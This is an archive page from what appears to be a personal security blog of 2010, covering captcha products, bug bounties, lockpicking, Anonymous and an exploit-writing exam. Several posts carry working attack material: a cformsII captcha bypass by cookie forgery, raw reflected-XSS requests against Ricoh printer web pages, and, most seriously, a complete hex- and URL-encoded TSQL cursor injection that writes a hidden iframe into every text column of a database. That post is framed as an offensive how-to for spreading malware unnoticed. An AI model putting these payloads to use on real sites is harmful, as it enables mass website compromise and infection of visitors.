Tuesday, 28 December 2010

A few words about NuCaptcha

After my recent posting about the Cforms Captcha Bypass Vulnerability the folks over at NuCaptcha asked me to take a look at their offering. I took a poke around the free version of the product/service that they offer.

A Slightly Different Approach:
Lots of people are trying to come up with new and innovative approaches to the Captcha concept as OCR bots continually demolish a lot of the products out there. On top of that, there are pay services now, where humans will set and crunch captchas for you all day long. This leaves us with a question of how to change the game enough to continue moving forward. I've seen a lot of different ideas about this, and nu/captcha's is far from the most innovative. That being said, it works well enough for now. Their Captcha's are animated, and provide text that is and isn't part of the captcha. You are asked to enter in only the text that appears in red.

This is definitely a step in the right direction. That being said, the red text always appears at the end of the string. I would think it might be a little more effectively to randomly colourise charachters within the string, not clumping them together, and not putting them at a predictable location. also, since they are colour coded, I can certainly envision an OCR bot capable of distinguishing colours. This is compensated for a bit by all the animation in the background. Especially the ones with the full advertisements in the background. This provides a lot of 'noise' to help confuse any OCR bots. However, I don't think the NuCaptcha system is going to be impervious to OCR techniques, not by a long shot.

Ways i might suggest to improve this technique:

  1. Use random charachters out of the larger text string to colour code
  2. Colourise all charachters in the string, different colours and randomly select the 'correct' colour each request (one request wants the blue letters, the next the yellows, etc). sort of adding entropy to both the letters and colours
What about the paid OCR crackers? Well, Nucaptcha claims they address this by increasing the ammount of time it take a person to recognise and complete each captcha, by a few seconds. Whether this is true or not, I doubt that it will make much of a serious impact. that being said, if anyone has any better ideas out there, i'd love to hear them.

Where their technique really shines through is more in usability than security. I have gotten to the point where the pure sight of a captcha irritates me. They are often so illegible that an actual human has a hard time filling the stupid things out correctly on the first try. I do not feel any of that frustration with their system. Also the idea to blend advertising space into their solution is a pretty savy business move in my opinion.

The Pseudo-Technical:

so I took some preliminary dives through their offerings. They offer PHP,Java, and .NET APIs. I subjected the .NEt and JAVA APIs to some static analysis tools and let them run. I then ran some quick php examples and their WordPress plugin through a Web application Scanner and let it fly. I snatched at some of their SWF components and ran them through a decompiler app, and didn't find much of itnerest there. Finally I poked and prodded from within burpsuite looking for anything unusual.

The long and short of it is that I found nothing of real interest there. I have not, and probably will not go digging line by line through their source code. For one thing, it looks like a bunch of the real work is offloaded back to their environment to some internal webapps on their side. For another, nothing in my cursory examinations turned up anything the least bit indicative of a problem. Maybe someone more determined will come along and find something i missed.

So is nucaptcha the "most secure" captcha solution out there? Beats me. I don't honestly know how to make such a comparison in the market place. What i do know is that it works, it is end-user friendly, and it does not have any glaring defects. Perhaps not as glowing of a recommendation as they were hoping for, but anything more definitive is just asking for me to be proven wrong. cheers!

UPDATE: Christopher Bailey from NuCaptcha wanted me to point out that the red letters option is only one form the security Captcha can take. They have different variants as can be seen Here. The actual  captcha text is still always at a predictable location within the string though, so my suggestion about randomly selecting characters within the string still stands. Thanks to the folk from NuCaptcha for inviting me to take a peek though. I certainly appreciate their openness if nothing else.

Friday, 17 December 2010

Dear Mr Haywood, Welcome to 2010

There has been some controversy over the recent rise in bug bounty programs. One response was issued by Anthony Haywood, CTO of Idappcom. You can find his article here. I read this article in disbelief at some of the 'points' espoused in this article. I will avoid the more mundane trollings  of the article and try to stick to the salient points.

At Idappcom, we’d argue that these sorts of schemes are nothing short of a publicity stunt and, infact, can be potentially dangerous to an end users security.
This is the crux of his argument. It is 2010, and we are still hearing the Security through Obscurity argument touted as a valid security strategy?

One concern is that, by inviting hackers to trawl all over a new application prior to its launch, just grants them more time to interrogate it and identify weaknesses which they may decide is more valuable if kept to themselves.
If a company is already at the phase of it's security evolution where it is attempting bug bounties, it more than likely has an SDL in place. This SDL should include rigorous review, source code analysis, and even penetration testing by an internal security team. Nobody is suggesting that a company should rely solely on bug bounties to find it's security flaws. Intimating that this is happening is a red herring and this statement is  a classic example of FUD in action. Mr Haywood is essentially saying "If you let hackers see your program before your customers get it, they will be even more likely to find ways to abuse it". First of all, to my knowledge these bug bounties do not include distributing pre-release versions of code to hackers on the Internet. It is simply a way of incentivising security researchers and/or hackers to responsible disclosure by offering monetary award for their contribution. Mr. Haywood, hackers are already going to be trawling all over these applications. A bug bounty is just trying to bribe them to giving what they find back to the vendor.

Which ties into my second point: what;'s the difference if they see it now or later. If a company did what you're suggesting, there will be a portion of people who may well hold back the information to use after release. There will, however, also be legitimate security researchers who will turn over what they find, which will likely overlap with the findings of the malicious sorts. This increases the chance that the vendor will be able to issue a fix before going to release. Explain to me again, how this is dangerous, or negative in any way?

The hacker would happily claim the reward, promise a vow of silence and then ‘sell’ the details on the black market leaving any user, while the patch is being developed or if they fail to install the update, with a great big security void in their defences just waiting to be exploited.

Yes some malicious hackers will try to do evil, but us good guys will likely find the same things and report it. Your statement seems to imply that anyone looking over the code would be malicious. Frankly, I find this insulting. I have turned in numerous vulnerabilities to vendors without any promise of reward even. I have gone full disclosure in the event that my attempts to elicit a response from the vendor have failed. The same can be said about any number of small time folk like me, never mind people like Tavis Ormandy, Michal Zalewski, HD Moore, Jeremiah Grossman, Rob Hansen , etc.  You seem to be taking a pretty broad shot at the security community in general, with statements such as these. moving on.

Sometimes it’s not even a flaw in the software that can cause problems. If an attack is launched against the application, causing it to fail and reboot, then this denial of service (DOS) attack can be just as costly to your organisation as if the application were breached and data stolen.
I'm not even sure what point you are trying to make here. Yes there are Denial of Service vulnerabilities out there. What does that have to do with your argument at all?

A final word of warning is that, even if the application isn’t hacked today, it doesn’t mean that tomorrow they’re not going to be able to breach it.
That's exactly right. That is why a continuous security program needs to be in place. Security needs to be a factor from project conception, through the development lifecycle, all the way past release. Testing needs to be done continually. A bug bounty is a way of crowd sourcing continued testing in the wild.

IT’s never infallible and for this reason penetration testing is often heralded as the hero of the hour. That said technology has moved on and, while still valid in certain circumstances, historical penetration testing techniques are often limited in their effectiveness. Let me explain – a traditional test is executed from outside the network perimeter with the tester seeking applications to attack.
Wow. You take one possible portion of a penetration test, and say "this is what a penetration test is" while ignoring all the other factors at play.  An external only Black Box pen test may go like this, but there are many different way to perform a pen test, depending upon the engagement.

However, as these assaults are all from a single IP address, intelligent security software will recognise this behaviour as the IP doesn’t change. Within the first two or three attempts the source address is blacklisted or fire walled and all subsequent traffic is immaterial as all activities are seen and treated as malicious.
If you are really really bad at performing penetration tests, this may be true. A real penetration tester will pivotwhenever possible. Since we are specifically talking about AppSec(that's short for Application Security Mr Haywood) this becomes even more relevant. In pen testing web apps it is extremely easy to disguise yourself as a perfectly normal user. A standard IPS is mostly ineffective in this realm, and WAFS are notoriously hard to configure in any meaningful way that does not break a complex application's functionality. Also, remembering that we are talking AppSec, a good pen tester will probably have proxies he can flow through. So if an IP gets blocked, he just comes from a different IP.

I was a little perplexed by this strange attack on penetration Testing. Then I found this article:

Idappcom seeks to displace penetration testers


Where you claim that your nifty little appliance will somehow replace penetration testers. So we can read your entire position as "don't trust manual testing, buy our product instead". Hardly the first time we've seen such a tactic from the vendors. Let's take a look at this for a moment though. Will your appliance detect someone exploiting a business logic flaw? will it shut down an attacker connecting to a file share with an overly permissive ACL? will it be able to detect multi-step attacks against web applications? Will it really notice a SQL injection attack, and if so how does it know the difference between a valid query and an injected one? These are the sorts of questions that present the burning need for manual human review on a repeat basis.  no matter how hard you try, you will never be able to fully automate this. Actual humans will always find things a program can't. Let's move back the the techjournalsouth.com article though.

 Instead you need two and both need to be conducted simultaneously if your network’s to perform in perfect harmony:

   Application testing combined with intrusion detection

Congratulations, we have all been saying there is no magic bullet for a long time. However, you present only two layers of defense in depth. application Testing and IPS by themselves are not enough. You need a full Security Development Lifecycle. You needs firewalls and IPS systems that are properly configured and audited on a regular basis. You need policies governing change management, and configuration management. You need proper network segmentation and separation of duties. You need hands on testers who know how to tear an application or system apart and find the weak points.


Intrusion detection, capable of spotting zero day exploits, must be deployed to audit and test the recognition and response capabilities of your corporate security defences. It will substantiate that, not only is the network security deployed and configured correctly, but that it’s capable of protecting the application that you’re about to make live or have already launched irrespective of what the service it supports is – be it email, a web service, anything.

First of all, see some of previous points about IPS/WAFS and protecting against web application attacks.  Secondly, let;'s talk about your 'zero day' protection. This protection is only as good as the signatures loaded into the device. I could write an entire book on why signature based security mechanisms are doomed to fail, and i would be far from the first person to speak at length on this subject. For some of the high points just look back at my posts with Michal Zalewski about the anti-virus world. I'll leave it there.

While we wait with baited breath to see who will lift Deutsche Post’s Security Cup we mustn’t lose sight of our own challenges. My best advice would be that, instead of waiting for the outcome and relying on others to keep you informed of vulnerabilities in your applications, you must regularly inspect your defences to make sure they’re standing strong with no chinks. If you don’t the bounty may as well be on your head.
Yes, and one of the ways you inspect these defenses, is to have skilled people testing them on a  regular basis. Relying on a magic bullet security appliance or application to save you is irresponsible and foolish. Don't buy into vendor FUD.

Special thanks to Dino Dai Zovi(found here and here) for pointing out this article.



Wednesday, 15 December 2010

cformsII CAPTCHA Bypass Vulnerability

The cformsII plugin for WordPress contains a vulnerability within its Captcha Verification functionality. This vulnerability exists due to an inherent trust of user controlled input. An attacker could utilise this vulnerability to completely bypass the captcha security mechanism on any wordpress forms created with this plugin.

Captcha Generation:
CformsII generates it's captcha by randomly selecting characters from a character set of ak,m,n,p-z2-9. I assume that the letters l and o, and the numerals 1 and 0 were excluded to avoid any confusion when rendered as an image. It selects a random number of these characters based on preset minimum and maximum limits, and assembles a string of them. It then creates an md5 hash of this string, prepends 'i+' to the hash and sets it as a cookie called 'turing_string_'. See the below code excerpts:
----------------------
$min = prep( $_REQUEST['c1'],4 );
$max = prep( $_REQUEST['c2'],5 );
$src = prep( $_REQUEST['ac'], 'abcdefghijkmnpqrstuvwxyz23456789');
----------------------

### captcha random code
$srclen = strlen($src)-1;
$length = mt_rand($min,$max);

$turing = '';
for($i=0; $i<$length; $i++)
$turing .= substr($src, mt_rand(0, $srclen), 1);

$tu = ($_REQUEST['i']=='i')?strtolower($turing):$turing;

setcookie('turing_string_'.$no, $_REQUEST['i'].'+'.md5($tu),(time()+60*60*5),"/");
--------------------------

This cookie is set when the user is presented with generated captcha image. When they submit their completed form, the capctha code is submitted in a POST parameter titled 'cforms_captcha'. This parameter is then md5'd and compared to the md5 value from the turing_string_ cookie. If the two hashes match, then it is considered to be valid.

-------------------------
else if( $field_type == 'captcha' ){  ### captcha verification

         $validations[$i+$off] = 1;

$a = explode('+',$_COOKIE['turing_string_'.$no]);

$a = $a[1];
$b = md5( ($captchaopt['i'] == 'i')?strtolower($_REQUEST['cforms_captcha'.$no]):$_REQUEST['cforms_captcha'.$no]);

if ( $a <> $b ) {
$validations[$i+$off] = 0;
$err = !($err)?2:$err;
}

}
-----------------------

The end result is that an attacker could pre-set a 'valid' captcha string. They then get the md5 hash of the string, and prepend “i%2b” (url encoded 'i+') to the value and set that as the turing_string_ cookie for their post requests. Every request set with this parameter and cookie combination will be inherently trusted as valid from the Captcha standpoint.

The problem here is two fold. The first issue, is that the captcha codes are not one time use codes, as they should be. So even without tricking the Captcha system in the first place, it would be possible to launch  a replay attack against this system to generate large amounts of submissions. Each captcha code should only be valid for one use and only during a very limited time window.

The second problem is the trust of user supplied data. The process is meant to create a validation of entered data against another piece of data. However both sets of data are freely offered up to the client-side for tampering. This completely negates the verification process as the server side is not truly in control of the validation at this point.

The take-away:
using cookies to store captcha data then comparing against user supplied input is not an appropriate method of validation for a number of reasons. The captcha code, whether in raw form or hashed should be stored server side for validation, should be valid for only one use, and should be valid only for a limited timeframe. This could be done by using an in-memory array, a database, or even a flatfile.

Tuesday, 9 November 2010

Ricoh Web Image monitor 2.03 Reflected XSS Vuln

I was poking at some Ricoh MFPs several days ago, when I found this. It is nothing to get to terribly excited about as it's just a reflected XSS. However, the ability to abuse any trusted internal IP should be treated as a threat. Companies have taken big hits from less. So without further ado, here are the petty little details:

Fun with Redirects:
My inital test was just an abuse of the redirect functionality that is being exploited for the vector.
GET /?";location.href="http://cosine-security.blogspot.com HTTP/1.1

HTTP/1.0 200 OK
Date: Tue, 09 Nov 2010 17:58:00 GMT
Server: Web-Server/3.0
Content-Type: text/html; charset=UTF-8
Content-Length: 683
Expires: Tue, 09 Nov 2010 17:58:00 GMT
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: cookieOnOffChecker=on; path=/
Connection: close

<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="refresh" content="1; URL=/web/guest/en/websys/webArch/message.cgi?messageID=MSG_JAVASCRIPTOFF&buttonURL=/../../../">
<meta http-equiv="Cache-Control" content="no-cache">
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Expires" content="-1">
<title>Web Image Monitor</title>
<script language="javascript">
<!--
function jumpPage(){
self.document.cookie="cookieOnOffChecker=on; path=/";
location.href="/web/guest/en/websys/webArch/mainFrame.cgi?";location.href="http://cosine-security.blogspot.com";
}
// -->
</script>
</head>
<body onLoad="jumpPage()"></body>
</html>


A more traditional XSS test will still work just as well of course:

Traditional Test:
GET /?--></script><script>alert(51494)</script> HTTP/1.1


HTTP/1.0 200 OK
Date: Fri, 29 Oct 2010 17:43:19 GMT
Server: Web-Server/3.0
Content-Type: text/html; charset=UTF-8
Content-Length: 672
Expires: Fri, 29 Oct 2010 17:43:19 GMT
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: cookieOnOffChecker=on; path=/
Connection: close

<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="refresh" content="1; URL=/web/guest/en/websys/webArch/message.cgi?messageID=MSG_JAVASCRIPTOFF&buttonURL=/../../../">
<meta http-equiv="Cache-Control" content="no-cache">
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Expires" content="-1">
<title>Web Image Monitor</title>
<script language="javascript">
<!--
function jumpPage(){
self.document.cookie="cookieOnOffChecker=on; path=/";
location.href="/web/guest/en/websys/webArch/mainFrame.cgi?--></script><script>alert(51494)</script>";
}
// -->
</script>
</head>
<body onLoad="jumpPage()"></body>

Thursday, 4 November 2010

Abusing TSQL Cursors for massive SQL Injection

I'm sure that there are plenty of people who already know about this technique. I have just recently discovered it however. Upon research, it looks like some malware goonies were using this to try and spread Zeus. We are going to look at a very fast and nasty way of abusing a SQL Injection vector. We will be abusing TSQL Cursors in order to rewrite a very large amount of data. So let's build this attack.

First we want to craft our ultimate payload. in this case we are going to make an iframe such as this:


Now we want to spray our hidden little iframe all voer the site. In order to maximise our potential of exposing viewers to it, we are gonig to overwrite all the char, varchar,nchar, and nvarchar fields. We will append our iframe to the end of each record, trying to just add ourselves to the existing data and avoid notice for as long as possible. This is where the TSQL Cursor comes into play. We are going to declare a cursor, based off of the sysobjects and syscolumns table in master. We are looking in those tables for a list of all the *char columsn in suer defined tables. We then sue the cursor to fetch each record and append our iframe in. the query should look something like this:

DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''''')FETCH NEXT FROM  Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

When we are all done, we close up shop, and deallocate the cursor. If everything went right, then we will be flying under the radar, and it could be a long time before anyone notices what we have done.

So now we have our payload, but we still need to get it in throguh the SQL Injection vector. to do this, we are going to use the Declare,CAST, EXEC method. We will convert our query to hex, which will give us:

0x4445434c415245204054207661726368617228323535292c404320766172636861722832353529204445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420612e6e616d652c622e6e616d652066726f6d207379736f626a6563747320612c737973636f6c756d6e73206220776865726520612e69643d622e696420616e6420612e78747970653d27752720616e642028622e78747970653d3939206f7220622e78747970653d3335206f7220622e78747970653d323331206f7220622e78747970653d31363729204f50454e205461626c655f437572736f72204645544348204e4558542046524f4d20205461626c655f437572736f7220494e544f2040542c4043205748494c4528404046455443485f5354415455533d302920424547494e20657865632827757064617465205b272b40542b275d20736574205b272b40432b275d3d727472696d28636f6e7665727428766172636861722c5b272b40432b275d29292b27273c696672616d65205352433d22687474703a2f2f636f73696e652d73656375726974792e626c6f6773706f742e636f6d223e272727294645544348204e4558542046524f4d20205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72

In our Injection string we will Declare a variable "Declare @S", then we will cast our Hex String to nvarchar into @S, and then, finally, we Exec @S. Once we have it built, we then URL encode, and we have a nasty little package to send:

DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4445434c415245204054207661726368617228323535292c404320766172636861722832353529204445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420612e6e616d652c622e6e616d652066726f6d207379736f626a6563747320612c737973636f6c756d6e73206220776865726520612e69643d622e696420616e6420612e78747970653d27752720616e642028622e78747970653d3939206f7220622e78747970653d3335206f7220622e78747970653d323331206f7220622e78747970653d31363729204f50454e205461626c655f437572736f72204645544348204e4558542046524f4d20205461626c655f437572736f7220494e544f2040542c4043205748494c4528404046455443485f5354415455533d302920424547494e20657865632827757064617465205b272b40542b275d20736574205b272b40432b275d3d727472696d28636f6e7665727428766172636861722c5b272b40432b275d29292b27273c696672616d65205352433d22687474703a2f2f636f73696e652d73656375726974792e626c6f6773706f742e636f6d223e272727294645544348204e4558542046524f4d20205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72%20AS%20NVARCHAR(4000));EXEC(@S);

This method, could of course b used in a number of different ways, but this is the probably the best bang for the buck. A quick and horribly easy way to turn a vulnerable site into a malware launching platform.

Saturday, 9 October 2010

Epic FALE!

So I got back from Security Bsides Atlanta last night. There were some interesting talks out there. Especially the one on Google and Bing hacking. Some really neat stuff there. Right now though, I want to talk about the guys from FALE . I heard these guys were going to be at Bsides from Schuyler Towne's Kickstarter update. Here's what Schuyler had to say for all of your nonbackers:
I'm sorry you can't be there. However - you can and should go to B-Sides, Atlanta! My friends at FALE: http://lockfale.com/, will be there running workshops, giving talks, and bringing tons of goodies. It's their first time running a Lockpicking Village, but I think they've got an honest shot to make it one of the best in the country. I just shipped them 1.5 gigs of material I've produced too, so hopefully that will add to their already considerable stores.
So go to Bsides I did. Hang out at the Lockpicking village I did. I walked in the door and John immediately says "Hey man, come on in and pick a lock". All the FALE guys introduced themselves, and I told them I was there because of Schuyler's post. That really got things going. Then I told them about the Charlotte Hackerspace and things really got going. I spent a lot of time in the Lockpicking Village, picking locks and hanging out with these guys. They had three challenges running, each one resulting in your name being entered into a drawing. The first Challenge was to simply pick a lock. The second challenge, "The MacGuyver Challenge", was to make your own tool out of scraps and open a lock with it. I went what I thought would be the easiest route, and made a padlock shim. It took me 6 or so tries to get one the right size that wouldn't break in the lock. In the process I cut my thumbs up pretty good. In the end I did open a Brinks padlock with my shim though. The Final Challenge was "The Pro Challenge". this involved opening on of their higher difficulty locks with security drivers. It took me almost an hour and half but I finally got that sucker open, and I was super happy! In the drawings,

 I actually got drawn twice in the giveaway, once for my MacGuyver win, which got me a nice starter set of the Sparrows Wizwazzles. I also got drawn for my Pro Challenge win and would ahve taken the largest Southern Specialties basket, but they had a strict 1 win policy. They wouldn't let me upgrade either =/ . It was okay though, because the guy who did win was pretty excited about it, and I was really happy for him. Besides, I will have a big set of Schuyler's picks coming anyways.

The day wrapped up and I braved the god forsaken Atlanta beltway to start home. Once I was clear of the heaviest traffic I decided to pull of at a Wendy's for dinner. Imagine my surprise when I am up at the counter and hear someone shout my name. I turn around, and there are the FALE guys. So we sat down, had dinner and hung out for a little bit. I have gotten past the straight boring facts now, so let me just say this: These guys are so awesome. I had so much fun hanging out with these guys it was nuts. They are smart guys, no doubt, but they are also super friendly, and just plain cool. One of the greatest things about them is their passion. These guys know alot about lock picking, and over that dinner they shared a lot of tips and secrets with me. What was great though, was not the knowledge itself, but the atmosphere around that table. These guys loved not only doing locksport, and knowing locksport, but sharing locksport. These were not like some of your typical hackers, who like to hoard knowledge and dole it out in small bits to make themselves pseudoimprotant. These guys couldn't stop spilling knowledge all over the place. It's like they couldn't help themselves!

They asked me about what I thoguht they could do better next time. I had really very little to offer from this standpoint, except that it would have been cool to talk more about wafer, disc, and tubular locks, and that competitions would have also been cool. They also asked me a bout the HackerSpace, and have expressed a lot of strong interest in coming and visiting, and maybe doing a talk for us. Whether they come up here, or I go down there next, I don't know. What I do know is that FALE and I have not seen the last of each other. Thanks John, Evan, Matt, Scott, and Adam! Oh, and thank you Schuyler for inspiring me to go in the first place!

Wednesday, 29 September 2010

Google and Safe(r) Browsing

So Google has announced a new tool. This tool, Safe Browsing Alerts seeks to notify ISPs of malicious web content hosted on their AS. I love to see things like this, and it gives me a little hope for the future. It is the proverbial step in the right direction to my line of thinking. The fight against malware needs to become more proactive.  However, I don't know how effective letting AS owners know will be.  The information really needs to go more towards hosting companies and the like. people with the ability to pull content.

Here is my brief, idealized, dream. We take the stop badware model and expand it. A strong coalition is created to proactively identify malicious content on the internet and stamp it out where possible. This coalition would include the major AV vendors (Kaspersky, F-Secure, TrendMicro,Symantec,Mcafee, Sophos, etc) and the major search engines Google, Microsoft, and Yahoo(does anyone really use yahoo anymore?). A crawler is designed to go out across the web and look for malicious content. I am envisioning two main branches of this:


  1. As new exploits/payloads are discovered, the crawler searches for specific files or content that indicate the presence of the exploit or payload. Very google-hacking approach. This would be like looking for the windows RDP web connection by doing intitle:"Remote Desktop Web Connection" inurl:tsweb . This detection can be avoided fairly easily, but it will still quickly catch some of the low hanging fruit.
  2. The actual crawler. This crawler goes out and actually analyses the content on the pages it crawls and looks for malicious content. This would be hard to do efficiently, I suspect, but could be done with proper resources.
So, assuming this dream comes true, what happens next? Well, a couple of things would happen at this point. The discovered malicious content would be cataloged. This would then be fed back to the participant  companies. It would go to the AV vendors to examine and create new definitions if needed. It would go to the search Providers to reflect in their own search engine results. Suddenly alongside your Google or Bing results, you see a warning "Potentially Dangerous Content Detected". This serves as a warning to the public, sort of a "caveat lector". Then, the coalition should attempt to notify appropriate parties. This could include AS owners,  hosting companies, and/or whois contact persons.

None of this of course 'solves' the problem. It is still up to individuals to do the right things. It is up to the user to not go to a site flagged as dangerous, and to have appropriate protection on their machine. It is up to the webmaster to make sure that their sites are not compromised, or hosting malicious content. What this could do, however, is raise visibility and awareness. It would give malware less places to lurk. Of course the bad guys will just move faster, finding new ways of hiding their stuff. It would be a start though. anyways, that's jsut my silly little dream. Who knows, maybe it will one day become a reality.

Friday, 24 September 2010

The Invisible War: March of the /b/tards

Here goes an attempt at starting a 'series'. The name 'Invisible War' may be reaching a bit, but sometimes it feels like it is appropriate. There are things developing on the internet that have very interesting ramifications. Perhaps I should say growing, instead of developing, as it seems a rather organic process. Today I would like to talk about the Internet Hate Machine that is 4chan.

For a very long time, the Internet has been growing these places. Usenet and IRC have always been bastions of trolls, flamers, and people you just don't want to get into it with. Offensive tactics often included various attack tools to carry out wars of annoyance against targets. I can very clearly remember the good ol days of IRC, full of skiddies with ICMP "nukers" and takeover scripts etc. As with everything else on the Internet, the Hate Machine grew and changed

4chan has become the penultimate embodiment of this writhing entity., thanks to /b/ . The denizens of 4chan /b/, known as /b/tards are an interesting and complicated 'group'. I user the term 'group' very loosely. /b/ is almost anarchy incarnate, and to assign any real structure to it, would be disingenuous. The /b/tards gave rise to Anonymous and all of the internet grief that particular group has caused. If you don't know, Anonymous is the group that carried out the campaign against the Church of Scientology. They launched site defacements, distributed videos that the church tried to suppress, and even organised real life protests outside of Church of Scientology facilities.  Anonymous began to demonstrate the true power of Internet Crowd sourcing.

Recently, the /b/tards have been on the move again. The news is abuzz with their attacks againsts the MPAA,RIAA, Aiplex Software, and BPI. This is allegedly in direct response to actions taken against the torrent hosting site thepiratebay.org. While not all of the attacks were successful, they have attracted a lot of notice. One has to wonder if that isn't the true aim. What would they accomplish, long term, by bringing down these servers. Even if they brought them down for more than a few hours, they would be brought back up, and actions would be taken to mitigate the attacks. They are not silencing their opposition, so maybe the goal is the opposite. To create a lot of noise. How many people knew about what Aiplex software was getting up to before, and how many know now? The same with ACS:Law? How much longer will the whole piracy issue stay in people's attention now because of these antics?

I do not know if this result was intended, or if the /b/tards are acting out of a much more visceral drive. Given that the average /b/tard is not amongst the highest forms of life on this planet, i would not ascribe much forethought to mot of their actions. /b/ is rather like a horde of rampaging orcs, but like orcs, once they get started they can be surprisingly effective. I find myself pondering the possability of a few dark sorcerers pulling the strings of this unruly horde.  I look at the 'call to arms' for some of these attacks and people start using crappy pe-built skiddie tools a lot of times, that probably have no chance of being truly effective against a serious target. However, if there were a few well hidden masterminds behind the scenes, we see a different picture.

Suppose you are a botherder or malicious hacker with a sinister agenda. You have decided that you can no longer stand the Foo Corp's policies, and want to take them down. You read the reports though, you know even botnets get tracked back to their owners a lot of the time. You need some way to keep the focus off of you. So you go crowd sourcing in /b/ . You whip the /b/tards into a frenzy and they pull out their toys and get ready. some of them undoubtedly know what they are actually doing, and that is even for the better. Now, you give them all a time and date, and everyone launches their attack. The IR Team at Foo Corp all of a sudden sees the deluge hitting their perimeter. While the firewalls and IPs are reflecting most of the useless crap that is being flung at them, you and a few of the more clever blokes, slip right past their perimeter.  Their IPS systems are already screaming at the top of their lungs, so who's to notice? You get in, do your damage, and get out. Meanwhile, the deluge continues. By the time it is all done, the folks at Foo Corp are going to have their hands full tracking back through the logs for quite a while. This means that the chances of anything being tracked back to you is greatly diminshed.

So are the denizens of /b/ the new secret cyber warriors? Is there a core cadre within Anonymous that is using the rest of the /b/ crew as little more than pawns? Are they guided by belief that they are in the right?  There seems to be evidence that at least some of them are waging an information war. They strike at powerful targets who manipulate the system to their advantage. Groups like the Church of Scientology, MPAA, BPI etc, get away with an awful lot, by turning the system to their advantage, and they sue considerable monetary resources and influence to ensure that they always have the advantage. So are groups like Anonymous just turning the tables a bit? Is this the beginnings of digital revolution? Or is it all just a bunch of angry adolescents with nothing better to do?

I don't have the answers to those questions. What I do know, is that this is a sign of things to come. The Internet is becoming more and more concrete. Impact on the net is having more and more tangible impact in the real world. As this trend increases, what is that going to do to the balance of power in our society, with groups like anonymous running around?

For more information on the recent attacks please read:
http://www.theregister.co.uk/2010/09/24/piracy_threat_lawyers_withstand_ddos/
http://www.theregister.co.uk/2010/09/20/4chan_ddos_mpaa_riaa/
http://www.sophos.com/blogs/chetw/g/2010/09/19/4chan-takes-mpaa-riaa-aiplex-wins/
http://torrentfreak.com/4chan-ddos-takes-down-mpaa-and-anti-piracy-websites-100918/

Wednesday, 22 September 2010

The CEPT Exam Practical

I finally received the word that I have passed my Certified Expert Penetration Tester(CEPT) certification exam. This was the best, and most enjoyable certification exam I have ever taken. There is a brief, and rather easy multiple-choice written exam. Then the real work begins. You are given 60 days to complete and submit a practical. This practical has three sections:
  1. Write a working Windows stack overflow exploit for a piece of software they provide
  2. Write a working remote stack overflow or a format string exploit for a piece of code they provide
  3. Reverse engineer a win32 binary to bypass it's registration mechanism.
The first portion of this was surprisingly easy. The software they provide you is an actual piece of windows software. It is old though so it needs to be run in an appropriate environment. I don't recall if it was WinXP compat, but I did all mine in a win2k VM, which provided some interesting challenges in terms of having to go searching through libraries for some calls. Also, you have to get a little tricky because the initial space you have to work with is not large enough for any meaningful shellcode in of itself. However, this really presents little trouble if you know what you're doing. My Time to Completion: 8 hours

I am going to come back to #2 in a minute, instead let's talk about #3. This was by far the most exciting prospect. This is the kind of stuff that just makes you love your work. alas, the IACRB does not put up any real challenge with their supplied target binary. Some well placed breakpoints in softICE and the whole thing reads like a book. Chances are that when you make your first alteration to the binary and test it, you are going to feel really unsatisfied when you realize it's done and you've already won. They throw no tricks or protection schemes in to really trip you up. My Time to completion: 2 hours

So that brings us back to the Linux exploit. I don't know who wrote the c code that they provide you, but I can tell you this: He is a bastard. They tell you that you can do either the remote buffer overflow or the format string. So, not wanting all the various headaches that format string attacks can bring, I tried the stack overflow first. The vulnerable function in this case is not your standard simple buffer overflowable function. The buffers are both declared at the beginning of int main, and are then passed to the vulnerable function as pointers. This means that you can't overwrite the return pointer of the 'vulnerable function'. Instead you are overflowing towards int main's return pointer. In of itself, this is not a problem. The problem comes in the stack layout for int main. Between the vuln buffer and the saved return pointer is the declaration of a socket file descriptor. This file descriptor has a value of 7, or 0x00000007 . Do you see the problem here? The socket itself is essentially acting as a stack canary. Because what happens is the control loop won't exit until it has read specific input off the socket. so if we overflow the socket fd, it goes to eprform a recv() call on a file descriptor that does not exist, returning an error, which does NOT break the control loop. The result, we never get our terminator input read from the socket, but it will keep going back and trying to read from a socket that it doesn't know where it is anymore. We end up in an endless loop. There is surely someway to beat this scenario. I don't think the IACRB would make that a 'trick question', but I'll be damned if i could figure out how to bypass that bit of nastiness.

So, after lots and lots of wasted time looking at the stack, i moved on to trying the format string. I had some trouble here that was due to my own lack of familiarity with a certain mechanism they use. It is a common c mechanism, so I have little excuse, i just didn't know much about how it operated on the stack. Once I figured that out there were a few tricks I had to use because of the nature of the program itself. There is a lot of backwards-forward flip-flop thinking involved here, but if you can keep your data flow straight in your head you'll do fine. If not, do what i did, use a lot of sheets of scrap paper. At one point during this, i wrote down every variable and it's offset just so I could visually see where everything was on the stack at a glance. This is very important. You are going to want to become intimately aware of where everything is on the stack and how it got there, it will make your life easier. The final challenge was then taking the exploit and pulling it together into a single cohesive exploit with no manual processes. This was of course a job for Perl, and my favourite language performed admirably with just a tiny bit of help from C(I decided to quickly write a statically compiled binary to do one little piece for me. I didn't know how to dot hat part in perl, and so I just fudged it a little bit with C, sue me.) My time to completion: ~ 3 weeks!

All things considered, I found the CEPT Practical Exam to be one of the most worthwhile things I've done. It is by far the best, most relevant, and most rewarding certification I've ever gone after.

